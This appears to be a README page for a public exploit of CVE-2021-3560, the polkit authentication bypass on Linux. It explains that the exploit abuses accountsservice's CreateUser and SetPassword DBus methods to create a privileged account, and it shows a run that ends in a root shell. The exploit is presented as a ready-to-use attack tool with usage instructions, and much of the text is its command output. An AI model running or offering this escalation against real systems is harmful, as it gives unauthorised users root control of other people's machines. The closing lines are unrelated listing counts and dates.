Polkit-exploit - CVE-2021-3560
Privilege escalation with polkit - CVE-2021-3560
Summary
CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a password to it and at the end logging as the created user and then elevate to root.
Exploit Code Author
Ahmad Almorabea @almorabea http://almorabea.net
Usage
[email protected]:~/Desktop$ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original Exploit Author: Kevin Backhouse
For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
[+]Starting the Exploit
[+] User Created with the name of ahmed
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
bash: cannot set terminal process group (46983): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/home/test/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/test/Desktop# whoami
root
[email protected]:/home/test/Desktop#
Demo
GUI Authentication
Terminal Authentication
Credit
Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)
1 Dec 16, 2021
![Risky [ Zero Tow ]](https://avatars.githubusercontent.com/u/76860656?v=4&s=60)
7 Dec 25, 2022
33 Jul 01, 2022
74 Dec 23, 2022
73 Jan 01, 2023
560 Dec 23, 2022
185 Dec 25, 2022
34 Nov 21, 2022
80 Dec 30, 2021
81 Jan 08, 2023
2 Nov 30, 2021
57 Oct 03, 2022
87 Dec 29, 2021
5 Jun 03, 2021
3 Jan 23, 2022
772 Jan 05, 2023
2 Dec 24, 2021
175 Dec 14, 2022
36 Dec 02, 2022
7 Sep 19, 2022